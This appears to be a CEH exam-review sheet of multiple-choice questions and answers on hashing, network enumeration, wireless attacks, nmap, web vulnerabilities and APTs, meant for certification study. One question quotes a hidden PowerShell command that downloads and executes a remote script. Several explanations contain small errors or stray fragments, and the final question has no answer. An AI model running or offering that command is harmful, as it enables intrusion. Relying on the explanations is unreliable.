CEH TEST QUESTIONS TO REVIEW A

Which of the following hashing algorithms results in a 160-bit fixed output? MD-5 SHA-1 NTLM SHA-2

SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

Which of the following hashing algorithms results in a 256-bit fixed output? MD-5 SHA-1 NTLM SHA-2

SHA-2

powershell.exe -nop -w hidden

This command executes the PowerShell environment without loading the PowerShell profile (-nop) and in a hidden window (-w hidden).

You found that sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. Which of the following protocols, which can send data using encryption and digital certificates, will help solve this problem? a. IP b. FTPS c. FTP d. HTTPS

b. FTPS https://en.wikipedia.org/wiki/FTPS FTPS (also known FTP-SSL, and FTP Secure) is an extension to the commonly used File Transfer Protocol (FTP) that adds support for the Transport Layer Security (TLS) and, formerly, the Secure Sockets Layer (SSL), which is now prohibited by RFC7568) cryptographic protocols. FTPS includes full support for the TLS and SSL cryptographic protocols, including the use of server-side public key authentication certificates and client-side authorization certificates. It also supports compatible ciphers, including AES, RC4, RC2, Triple DES, and DES. It further supports hash functions SHA, MD5, MD4, and MD2.

You simulate an attack on your organization's network resources and target the NetBIOS service. You decided to use the NetBIOS API for this attack and perform an enumeration. After finishing, you found that port 139 was open, and you could see the resources that could be accessed or viewed on a remote system. Also, you came across many NetBIOS codes during enumeration. Which of the following NetBIOS codes is used for obtaining the messenger service running for the logged-in user? a. <20> b. <00> c. <03> d. <1B>

c. <03> https://en.wikipedia.org/wiki/NetBIOS NetBIOS is a protocol used for File and Print Sharing under all current versions of Windows. While this in itself is not a problem, the way that the protocol is implemented can be. There are a number of vulnerabilities associated with leaving this port open. NetBios services: · NETBIOS Name Service (TCP/UDP: 137) · NETBIOS Datagram Service (TCP/UDP: 138) · NETBIOS Session Service (TCP/UDP: 139) The NetBIOS Suffix, alternately called the NetBIOS End Character (endchar), is the 16th character of a NetBIOS name and indicates service type for the registered name. The number of record types is limited to 255; some commonly used values are: For unique names: · 00: Workstation Service (workstation name) · 03: Windows Messenger service · 06: Remote Access Service · 20: File Service (also called Host Record) · 21: Remote Access Service client · 1B: Domain Master Browser - Primary Domain Controller for a domain · 1D: Master Browser For group names: · 00: Workstation Service (workgroup/domain name) · 1C: Domain Controllers for a domain (group record with up to 25 IP addresses) · 1E: Browser Service Elections

Which of the following is a file on a web server that can be misconfigured and provide sensitive information for a hacker, such as verbose error messages? a. administration.config b. idq.dll c. httpd.conf d. php.ini

d. php.ini *keyword is verbose error message https://blog.securityinnovation.com/blog/2013/10/php-security-configuring-the-phpini-file-properly.html php.ini file is exposed inside the 'cgi-bin' directory. This allows any unauthenticated, remote user to discover sensitive information about your server(s), including database logins and passwords and verbose error messages.

Side-Channel Attack

https://en.wikipedia.org/wiki/Side-channel_attack A side-channel attack is any attack based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself (e.g. cryptanalysis and software bugs). Timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information, which can be exploited. Some side-channel attacks require technical knowledge of the internal operation of the system, although others such as differential power analysis are effective as black-box attacks. The rise of Web 2.0 applications and software-as-a-service has also significantly raised the possibility of side-channel attacks on the web, even when transmissions between a web browser and server are encrypted (e.g. through HTTPS or WiFi encryption), according to researchers from Microsoft Research and Indiana University.ntities may correspond to the same local entity.

A system administrator wants to verify that external IP addresses cannot collect software versioning from servers on the network. Which of the following should the system administrator do to confirm the network is protected? A. Analyze packet captures B. Utilize netstat to locate active connections C. Use nmap to query known ports D. Review the ID3 logs on the network

A. Analyze packet captures Captured packets show you the information that was traveling through certain files, etc. Packet sniffers detail the information they've received, so working through those shows if the external network shows or details software versions.

You are conducting a wireless penetration test against an organization. You have identified that they are using WEP encryption on their wireless access points. You are impatient and do not want to wait to collect enough packets to find a repeated initialization vector. You decide to extract part of the key material from one of the packets and use it to send an ARP request to the AP. Which of the following exploits did you utilize in this attack? A. Fragmentation attack B. Deauthentication attack C. Karma attack D. Downgrade attack

A. Fragmentation attack A fragmentation attack obtains the pseudorandom generation algorithm (PRGA) of network packets used in WEP. The PRGA can be used to craft encrypted packets that you can inject into the access point. These injected packets can speed up cracking the WEP password; otherwise, it might take a while to receive enough packets to get the repeated IV. In a fragmentation attack, you extract part of the key material from at least one packet and use this to send an ARP request to the AP. If successful, the AP responds with more of the key material in the packet echoed back to you. You repeat this process many times until around 1500 bytes of the PRGA is captured, at which point you can then use a packet crafting tool to begin the injection process.

What encryption does WPA2 use?

AES (Advanced Encryption Standard)

A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system's kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many your servers may be affected. What should you do to find all of the affected servers within your network? A. Manually review the syslog server's logs B. Conduct an OS fingerprinting scan across the network C. Conduct a packet capture of data traversing the server network D. Conduct a service discovery scan on the network

B. Conduct an OS fingerprinting scan across the network By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually review the Syslog server's log would take too long, and would not find servers that don't send their logs to the Syslog server. Conducting a packet capture would only allow you to find the server actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not identify which servers are running which operating systems effectively. For example, if you see that the Apache web service is running on port 80, it doesn't indicate running Linux or Windows as the underlying server.

Which of the following focuses on using digitized data as an internal means to reach a physical goal? A. IT systems B. OT systems C. Digital products D. Services

B. OT systems Operational technology (OT) is the application of digital technology for detecting or causing changes in physical devices through monitoring and/or control. OT differs from IT in that it uses digitized data as an internal means to a physical goal, rather than to make information available to users. OT refers to physical devices (for instance, valves and pumps in machinery) that use digitized data to take physical action. OT devices can be as small as the engine control module (ECM) of a car or as large as the distributed control network of a national electricity grid. The collective term 'industrial control systems' (ICSs) refers to OT systems such as supervisory control and data acquisition (SCADA) systems, distributed control systems (DCSs), remote terminal units (RTUs), and programmable logic controllers (PLCs), along with dedicated networks and organization units. The Internet of Things (IoT) supports OT devices, allowing them to connect both to each other and to information systems.

Ivan, the evil hacker, decided to attack the cloud services of the target organization. First of all, he decided to infiltrate the target's MSP provider by sending phishing emails that distributed specially created malware. This program compromised users' credentials, and Ivan managed to gain remote access to the cloud service. Further, he accessed the target customer profiles with his MSP account, compressed the customer data, and stored them in the MSP. After this, he used this information to launch further attacks on the target organization. Which of the following cloud attacks did Ivan perform? A. Cloud cryptojacking B. Cloudborne attack C. Cloud hopper attack D. Man-in-the-cloud (MITC) attack

C. Cloud hopper attack Keyword is MSP provider Operation Cloud Hopper was an extensive attack and theft of information in 2017 directed at MSPs in the United Kingdom (U.K.), United States (U.S.), Japan, Canada, Brazil, France, Switzerland, Norway, Finland, Sweden, South Africa, India, Thailand, South Korea and Australia. The group used MSP's as intermediaries to acquire assets and trade secrets from MSP-client engineering, industrial manufacturing, retail, energy, pharmaceuticals, telecommunications, and government agencies. Operation Cloud Hopper used over 70 variants of backdoors, malware and trojans. These were delivered through spear-phishing emails. The attacks scheduled tasks or leveraged services/utilities to persist in Microsoft Windows systems even if the computer system was rebooted. It installed malware and hacking tools to access systems and steal data. These malware were delivered through spear-phishing emails that targeted APT10's MSPs of interest, posing as a legitimate organization like a public sector agency. To maintain their foothold on the infected system, the group employed tools that stole legitimate credentials (with administrator privileges) used to access the MSP and its client's shared system/infrastructure. This is also what the group uses to laterally move and gain further access to the MSP's client's network. The attack schedules tasks or leverages services/utilities in Windows to persist in the systems even if the system is rebooted. APT10 didn't just infect high-value systems. It also installed malware on non-mission-critical machines which it would then use to move laterally into their targeted computers—a subterfuge to prevent rousing suspicion from the organization's IT/system administrators. APT10 is noted to use open-source malware and hacking tools, which they've customized for their operations, and furtively access the systems via Remote Desktop Protocol or use RATs to single out which data to steal. These pilfered data are then collated, compressed, and exfiltrated from the MSP's network to the infrastructure controlled by the attackers.

Identify a vulnerability in OpenSSL that allows stealing the information protected under normal conditions by the SSL/TLS encryption used to secure the Internet? A. SSL/TLS Renegotiation Vulnerability B. Shellshock C. Heartbleed Bug D. POODLE

C. Heartbleed Bug Keyword is OpenSSL Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension. The vulnerability is classified as a buffer over-read, a situation where more data can be read than should be allowed. Incorrect answers: SSL/TLS Renegotiation Vulnerability The vulnerability is with the renegotiation feature, which allows one part of an encrypted connection (the one taking place before renegotiation) to be controlled by one party with the other part (the one taking place after renegotiation) to be controlled by another. A MITM attacker can open a connection to an SSL server, send some data, request renegotiation, and, from that point on, continue to forward to the SSL server the data coming from a genuine user. One could argue that this is not a fault in the protocols, but it is certainly a severe usability issue. The protocols do not ensure continuity before and after negotiation. To make things worse, web servers will combine the data they receive prior to renegotiation (which is coming from an attacker) with the data they receive after renegotiation (which is coming from a victim). This issue is the one affecting the majority of SSL users. Shellshock https://en.wikipedia.org/wiki/Shellshock_(software_bug) Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. POODLE https://en.wikipedia.org/wiki/POODLE The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryption") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014"). On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced.

Which of the following encryption types was used by WPA to better secure wireless networks than WEP? A. CCMP B. AES C. TKIP D. IV

C. TKIP Wi-Fi Protected Access (WPA) fixes most of the security problems with WEP. WPA still uses the RC4 cipher but adds a mechanism called Temporal Key Integrity Protocol (TKIP) to fix the issues with key generation.

What nmap switch would you use to determine which UDP ports are open on a targeted network? A. -sN B. -sP C. -sS D. -sU

D. -sU In nmap, the -sU flag is used to scan UDP ports. The -sS flag will only scan TCP ports using an SYN scan (stealth scan). The -sP flag is a legacy (and depreciated) command for a ping scan. The -sN flag is used to conduct a TCP NULL scan.

A penetration tester is conducting an assessment of a wireless network that is secure using WPA2 Enterprise encryption. Which of the following are major differences between conducting reconnaissance of a wireless network versus a wired network? (SELECT TWO) 1. Encryption 2. Network access control 3. Port security 4. Authentication 5. Physical accessibility 6. MAC filtering

1. Encryption and 5. Physical Accessibility Most wireless networks utilize end-to-end encryption, whereas wired networks do not. Physical accessibility is another major difference between wireless and wired networks since wireless networks can be accessed from a distance using powerful antennas. Authentication, MAC filtering, and network access control (NAC) can be implemented equally on wired and wireless networks. Port security is only applicable to wired networks.

You must discover all the active devices hidden by a restrictive firewall in the IPv4 range in a target network. Which of the following host discovery techniques will you use? A. ARP ping scan B. UDP scan C. ACK flag probe scan D. TCP Maimon scan

A. ARP Ping Scan keyword is TARGET NETWORK. Address Resolution Protocol (ARP) is used by hosts on a network to resolve IP addresses into Media Access Control (MAC) addresses, which can be interpreted as a network interface's unique serial number. Hosts on an Ethernet network use MAC addresses rather than IP addresses to communicate. When a host tries to create a connection to another host (on the same subnet), it first needs to obtain the second host's MAC address. In this process, Host A sends an ARP request to the subnet's broadcast address to which it is connected. Every host on the subnet receives this broadcast, and the host with the IP address in question sends an ARP reply back to Host A with its MAC address. After receiving the ARP reply from Host B, Host A can connect to Host B. ARP is required for an Ethernet network to function properly, so it typically is not blocked by a firewall. If ARP requests were blocked, no-host would be able to "find" a computer on a network and connect to it. For all intents and purposes, the system would be unplugged from the network. One possible drawback to this system of using ARP to ping a host is that the ARP protocol is not a routed protocol. If you are not on the same subnet as the host you are trying to connect to, then this method is not going to work without first joining that subnet, which may or may not be physically possible. Thus by sending an ARP request, you are virtually guaranteed to get a reply.

A disgruntled employee executes a man-in-the-middle attack on the company network. Layer 2 traffic destined for the gateway is redirected to the employee's computer. What type of attack is this an example of? A. ARP cache poisoning B. IP spoofing C. Amplified DNS attack D. Evil twin

A. ARP cache poisoning Keyword here is Layer 2. ARP works with MAC addresses which operate on Layer 2 of OSI model. ARP poisoning reroutes data and allows an attacker to intercept packets of data intended for another recipient. ARP attacks can be sent from any host on the local area network, and the goal is to associate the host so that any traffic meant for something else will instead go directly to the attacker's PC.

Which of the following layers in IoT architecture helps bridge the gap between two endpoints, such as a device and a client, and carries out message routing, message identification, and subscribing? A. Access Gateway. B. Edge Technology. C. Middleware. D. Internet.

A. Access Gateway. The first layer of the Internet of Things consists of Sensor-connected IOT devices: These are the small, memory-constrained, often battery-operated electronics devices with onboard sensors and actuators. These could either function as standalone sensing devices or be embedded as part of a bigger machinery for sensing and control. Three main capabilities of a typical IOT device are: · being able to sense and record data · being able to perform light computing and finally · being able to connect to a network and communicate the data Examples of these include fitness trackers, agricultural soil moisture sensors, medical sensors for measuring blood glucose levels and more. There are a huge number of startups and established companies competing to come up with newer and newer sensors, actuators and devices. The second layer consists of IOT gateway devices: The various IOT devices of layer 1 need to be connected to the internet via a more powerful computing device called the IOT gateway which primarily acts like a networking device. So, similar to how a WiFi router helps us connect many laptops, phones and tablets to the internet at home, the IOT gateway aggregates data from numerous sensing devices and relays it to the cloud. These gateways are critical components of the IOT ecosystem. Typically, IOT gateways are equipped with multiple communication capabilities (like Bluetooth, Zigbee, LoRa WAN, Sub-GHz proprietary protocols) to talk to the IOT devices on one end and a connection to the IP (Internet) based network on the other side (over WiFi, Ethernet or Cellular link). The Third layer of IOT is the Cloud: All the sensor data relayed by IOT gateways is stored on cloud hosted servers. These servers accept, store and process data for analysis and decision making. This layer also enables creation of live dashboards which decision makers can monitor and take proactive data driven decisions. Today, almost all cloud computing companies have custom service offerings for IOT solutions. The fourth layer is IOT Analytics: This is where the magic happens and the collected raw data is converted into actionable business insights, which can help improve business operations, efficiency or even predict future events like machine failure. This layer employs different data science and analytics techniques including machine learning algorithms to make sense of the data and enable corrective action.

After issuing the command "telnet diontraining.com 80" and connecting to the server, what command conducts the banner grab? A. HEAD / HTTP/1.1 B. PUT / HTTP/1.1 C. HEAD / HTTP/2.0 D. PUT / HTTP/2.0

A. HEAD/HTTP/1.1 To conduct a banner grab using telnet, you first must connect to the server using "telnet webserver 80". Once the connection establishes, you will receive a blank prompt, and you then issue the command "HEAD / HTTP/1.1". It requests the document header from the server and provides information such as the server software version and the server's operating system.

If you cannot ping a target because you are receiving no response or a response that states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to elicit a response from a host using TCP, what tool would you use? A. Hping B. Traceroute C. Ptunnel D. Broadcast ping

A. Hping Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command but offered far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. Hping also allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Hping does not support IPv6, though, so the NMAP creators have created Nping to fill this gap and serve as an updated variant of Hping. Traceroute and tracert are computer network diagnostic commands for displaying the route and measuring packets' transit delays across an Internet Protocol network. Traceroute uses ICMP and not TCP. Broadcast ping is simply pinging the subnet's broadcast IP using the ping command, but if a regular ping does not work, neither will a broadcast ping. Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. Ptunnel is used as a covert channel, not to elicit a response from a host using TCP.

Your company is adopting a cloud-first architecture model. Management wants to decommission the on-premises SIEM your analysts use and migrate it to the cloud. Which of the following is an issue with using this approach? A. Legal and regulatory issues may prevent data migration to the cloud B. A VM escape exploit could allow an attacker to gain access to the SIEM C. The company will be dependent on the cloud provider's backup capabilities D. The company will have less control over the SIEM

A. Legal and regulatory issues may prevent data migration to the cloud If there are legal or regulatory requirements that require the company to host their security audit data on-premises, then moving to the cloud will not be possible without violating applicable laws. For example, some companies must host their data within their national borders, even if migrating to the cloud. The other options presented are all low risk and can be overcome with proper planning and mitigations. Most cloud providers have degrees of redundancy far above what any individual on-premises provider will be able to generate, making the concern over backups a minimal risk. If the SIEM is moved to a cloud-based server, it could still be operated and controlled in the same manner as the previous on-premise solution using a virtualized cloud-based server. While a VM or hypervisor escape is possible, they are rare and can be mitigated with additional controls.

Due to new regulations, your organization's CIO has the information security team institute a vulnerability management program. What framework would BEST support this program's establishment? A. NIST B. OWASP C. SDLC D. SANS

A. NIST (National Institute of Standards and Technology) *keyword is the BEST, which would be NIST. OWASP does have framework but it is a community based one. NIST produced a useful patch and vulnerability management program framework in its Special Publication (NIST SP 800-40). It would be useful during the program's establishment and provide a series of guidelines and best practices. Wrong Answers SANS is a company specializing in cybersecurity and secure web application development training and sponsors the Global Information Assurance Certification (GIAC). SDLC is a software development lifecycle. It is a method for dividing programming projects into separate phases. Open Web Application Security Project (OWASP) is a community effort that provides free access to many secure programming resources. The resources provided include documentation on web app vulnerabilities and mitigation tactics, software tools used to identify and handle threats that target web applications, frameworks for secure development life cycle implementation, frameworks for penetration testing web apps, general secure coding best practices, guidelines for specific web-based languages, and more.

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database? A. SQL injection B. Cross-site scripting C. Buffer overflow D. Denial of service

A. SQL injection A SQL injection poses the most direct and more impactful threat to an organization's database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to sensitive information disclosure. A buffer overflow attack attempts to overwrite the memory buffer to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn't intended to disclose information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow for other malicious code running. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused on the user, not the server or database.

The Web development team is holding an urgent meeting, as they have received information from testers about a new vulnerability in their Web software. They make an urgent decision to reduce the likelihood of using the vulnerability. The team beside to modify the software requirements to disallow users from entering HTML as input into their Web application. Determine the type of vulnerability that the test team found? A. SQL injection vulnerability. B. Cross-site Request Forgery vulnerability. C. Website defacement vulnerability. D. Cross-site scripting vulnerability.

D. Cross-site scripting vulnerability There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS flaws: non-persistent and persistent. In this issue, we consider the non-persistent cross-site scripting vulnerability. The non-persistent (or reflected) cross-site scripting vulnerability is by far the most basic type of web vulnerability. These holes show up when the data provided by a web client, most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content. Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection. A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue.

Sarah has reason to believe that systems on her network have been compromised by an APT. She has noticed many file transfers outbound to a remote site via TLS-protected HTTPS sessions from unknown systems. Which of the following techniques would most likely detect the APT? A. Network traffic analysis B. Network forensics C. Endpoint behavior analysis D. Endpoint forensics

D. Endpoint forensics An advanced persistent threat (APT) is a stealthy computer network threat actor, typically a nation-state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. APTs usually send encrypted traffic so that they are harder to detect through network traffic analysis or network forensics. This means that you need to focus on the endpoints to detect an APT. Unfortunately, APTs are very sophisticated, so endpoint behavioral analysis is unlikely to detect them easily, so Sarah will need to conduct endpoint forensics as her most likely method to detect an APT and their associated infections on her systems.

You are planning an engagement with a new client. Which target type should be selected to simulate an APT? A. Internal B. On-site C. Third-party hosted D. External

D. External An advanced persistent threat (APT) is a threat that uses multiple attack vectors to gain unauthorized access to sensitive resources. APTs are often funded by nation-states and used for intelligence-gathering operations against the government, military, and commercial networks. In general, APT attacks as an external target type.

Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host? A. netcat B. telnet C. wget D. ftp

D. FTP FTP cannot be used to conduct a banner grab. A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.

You have detected an abnormally large amount of traffic coming from local computers at night. You decide to find out the reason, do a few checks and find that an attacker has exfiltrated user data. Also, you noticed that AV tools could not find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. Which of the following type of malware did the attacker use to bypass your company's application whitelisting? A. Logic bomb malware B. Zero-day malware C. Phishing malware D. Fileless malware

D. Fileless Malware

All the industrial control systems of your organization are connected to the Internet. Your management wants to empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption. You have been assigned to find and install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools will you use to accomplish this task? A. Robotium B. BalenaCloud C. IntentFuzzer D. Flowmon

D. Flowman According to EC-Council's study guide: "Flowmon empowers manufacturers and utility companies to ensure the reliability of their industrial networks to avoid downtime and disruption of service continuity"

You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry-standard benchmarks? A. Utilizing an operating system SCAP plugin B. Utilizing an authorized credential scan C. Utilizing a non-credential scan D. Utilizing a known malware plugin

A. Utilizing an operating system SCAP plugin *Keyword is industry standard. Security Content Automation Protocol (SCAP) is a multi-purpose framework of specifications supporting automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement. It is an industry-standard and support testing for compliance. The other options will not allow for a truly repeatable process since individual scans would occur each time instead of comparing against a known good baseline.

A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst? A. Web application vulnerability scan B. Database vulnerability scan C. Port scan D. Network vulnerability scan

A. Web application vulnerability scan Since Apache is being run on the scanned server, this indicates a web server. Therefore, a web application vulnerability scan would be the most likely to provide valuable information. A network vulnerability scan or port scan can provide valuable information against any network-enabled server. Since an Apache server doesn't contain a database by default, running a database vulnerability scan is not likely to provide any valuable information to the analyst.

Session splicing is an IDS evasion technique that exploits how some IDSs do not reconstruct sessions before performing pattern matching on the data. The idea behind session splicing is to split data between several packets, ensuring that no single packet matches any patterns within an IDS signature. Which tool can be used to perform session splicing attacks? A. Whisker B. Burp C. Hydra D. tcpsplice

A. Whisker

Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command? A. nmap -Pn 10.0.0-3.0 B. nmap -Pn 10.0.0.0/23 C. nmap -Pn 10.0.0.0,1.0,2.0,3.0 D. nmap -Pn 10.0.0.0/25

A. nmap -Pn 10.0.0-3.0 The simplest way to scan multiple subnets adjacent to each other is to use the -Pn tells the command to conduct a host-only scan of every IP in this target space without using ping. Using the dash (-) in the IP address means to scan "this network through this network." So, 10.0.0-3.0 will scan every IP from 10.0.0.0 through 10.0.3.255.

You must to identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. Which of the following nmap commands do you must use to perform the TCP SYN ping scan? A. nmap -sn -PS < target IP address > B. nmap -sn -PO < target IP address > C. nmap -sn -PA < target IP address > D. nmap -sn -PP < target IP address >

A. nmap -sn -PS < target IP address > PS - Protocol SYN Ping -PA<port list> - TCP ACK Ping -PO<protocol list> - IP Protocol Ping -PE, -PP, and -PM - ICMP Ping Types

You make a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryptions. What type of attack are you trying to perform? A. Chosen-plaintext attack B. Adaptive chosen-plaintext attack C. Ciphertext-only attack D. Known-plaintext attack

B. Adaptive chosen-plaintext attack A shape adaptive chosen-plaintext attack is a chosen-plaintext attack scenario in which the attacker has the ability to make his choice of the inputs to the encryption function based on the previous chosen-plaintext queries and their corresponding ciphertexts. The scenario is clearly more powerful than the basic chosen-plaintext attack but is probably less practical in real life since it requires the interaction of the attacker with the encryption device.

Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? A. WHOIS lookups B. Banner grabbing C. BGP looking glass usage D. Registrar checks

B. Banner grabbing This falls under active reconnaissance.

A penetration tester issued the following command on a victimized Windows system: c:\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://diontraining.com/updates') Based on this command, which of the following exploits is the penetration tester MOST likely trying to conduct? A. Scheduling a task for persistence B. Download and execute a remote script C. Conduct DLL hijacking D. Exploiting an unquoted service paths

B. Download and execute a remote script This command executes the PowerShell environment without loading the PowerShell profile (-nop) and in a hidden window (-w hidden). The command powershell.exe is running is shown after the -c, which stands for executing a command or script block and then exiting. This command in PowerShell to Invoke-Expression (IEX) creates a new web client object and then downloads the file located at the URL provided. This file could be malicious, and if it is another PowerShell script, it will be executed once downloaded.

You are conducting a static analysis of an application's source code and see the following: (String) page += "<type name='id' type='INT' value='" + request.getParameter("ID") + "'>"; Based on this code snippet, which of the following security flaws exists in this application? A. Race condition B. Improper input validation C. Improper error handling D. Insufficient logging and monitoring

B. Improper input validation Based on this code snippet, the application is not utilizing input validation. This would allow a malicious user to conduct an XSS (cross-site scripting) attack. For example, an attacker could input the following for a value of "ID": MALICIOUS SCRIPT GOES HERE. This could cause the victim ID to be sent to "malicious-website.com" where additional code could be run, or the session can then be hijacked. Based on the code snippet provided, we have no indications of the level of logging and monitoring being performed, nor if proper error handling is being conducted. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer.

Which of the following tools is a command-line vulnerability scanner that scans web servers for dangerous files/CGIs? A. John the Ripper B. Nikto C. Kon-Boot D. Snort

B. Nikto Nikto is a free software command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software, and other problems. It performs generic and server types specific checks. It also captures and prints any cookies received. The Nikto code itself is free software, but the data files it uses to drive the program are not. Incorrect answers: Snort https://www.snort.org/ Snort is a free open source network intrusion detection system (IDS) and intrusion prevention system (IPS) created in 1998 by Martin Roesch, founder and former CTO of Sourcefire. Snort is now developed by Cisco, which purchased Sourcefire in 2013. John the Ripper https://www.openwall.com/john/ John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. Kon-Boot https://en.wikipedia.org/wiki/Kon-Boot Kon-Boot is a software utility that allows users to bypass Microsoft Windows passwords and Apple macOS passwords (Linux support has been deprecated) without lasting or persistent changes to system on which it is executed. It is also the first reported tool capable of bypassing Windows 10 online (live) passwords and supporting both Windows and macOS systems.

Which of the following secure coding best practices ensures a character like < is translated into the &lt string when writing to an HTML page? A. Session management B. Output encoding C. Error handling D. Input validation

B. Output encoding keyword is translated not rejected** Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the &lt; string when writing to an HTML page. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering the malfunction of various downstream components. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID.

The management at Steven's work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network? A. A discovery scan using a port scanner B. Router and switch-based MAC address reporting C. A physical survey D. Reviewing a central administration tool like a SCCM

B. Router and switch-based MAC address reporting The best option is MAC address reporting from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port connected to a network device.

Which of the following hashing algorithms results in a 160-bit fixed output? A. MD-5 B. SHA-1 C. NTLM D. SHA-2

B. SHA-1 SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization's AAA services manager? A. SMS should be encrypted to be secure B. SMS messages may be accessible to attackers via VoIP or other systems C. SMS should be paired with a third factor D. SMS is a costly method of providing a second factor of authentication

B. SMS messages may be accessible to attackers via VoIP or other systems NIST's SP 800-63-3 recommends that SMS messages be deprecated as a means of delivering a second factor for multifactor authentication because they may be accessible to attackers. SMS is unable to be encrypted (at least without adding additional applications to phones). A third factor is typically not a user-friendly recommendation and would be better handled by replacing SMS with the proposed third factor. SMS is not a costly method since it can be deployed for less than $20/month at scale.

Viktor, a professional hacker, targeted an organization's network to sniff all the traffic. During this process, Viktor plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network. What is the attack performed by Viktor in the above scenario? A. VLAN hopping attack B. STP attack C. DNS poisoning attack D. ARP spoofing attack

